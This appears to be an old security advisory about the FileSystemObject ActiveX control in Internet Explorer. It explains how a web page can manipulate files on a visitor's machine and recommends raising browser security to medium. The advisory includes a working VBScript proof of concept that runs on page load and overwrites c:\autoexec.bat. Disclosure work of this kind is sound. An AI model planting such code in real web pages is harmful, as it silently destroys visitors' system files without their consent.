COMMAND
ActiveX (FileSystemObject)
SYSTEMS AFFECTED
Win systems running IE browser in 'unsecure' mode
PROBLEM
Frank Luzsicza found following. During his research on the
ActiveX object FileSystemObject, he had come across some
disturbing results. Its existence on a client workstation may
allow malicious file manipulation directed by a server-side
hypertext web page.
The FileSystemObject supports the "wintel" platforms file
manipulation through a series of KERNEL APIs and a handful of
object methods, such as Read (), ReadAll (), Write (), ...etc.
This allows a server to pass this object to its client as an
ActiveX control and instanciate it in the client's environment.
As long as the supportive code is a client-side scripting
language, (such as VBScript, JavaScript, ...etc.) this piece of
code will manipulate the clients file structure.
Tested environments:
Server: Microsoft IIS 4.0 from the NT Option Pack 4.0 SP 4.0
Client: Any "wintel" machine running Internet Explorer 3.X, 4.0, 5.0.
A much better explanation would be probably achieved by a real
world example. If you wanted to write a message "@echo HELLO
FRIEND !" into every persons AUTOEXEC.BAT file that visited your
web page, it could be achieved using the FileSystemObject ActiveX
control. The web site residing on MS IIS will only need to
contain a DEFAULT.HTML. (Not even an ASP is necessary):
<!-- Sample Code - START --!>
<SCRIPT LANGUAGE="VBScript">
Public Sub OnLoad_Sub()
Const ForWriting = 2, FILE_NAME = "c:\autoexec.bat"
Dim fso, f
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile(FILE_NAME, ForWriting )
f.Write "@echo HELLO FRIEND !"
f.Close
End Sub
</SCRIPT>
<!-- Sample Code - END --!>
To execute this code on the client side the web page would need to call this function, for instance from the body tag.
<BODY ONLOAD="OnLoad_Sub()">
SOLUTION
All IE web browsers should have their security setting raised to
at least MEDIUM level. This will prevent the browser downloading
any ActiveX components without prior authorization.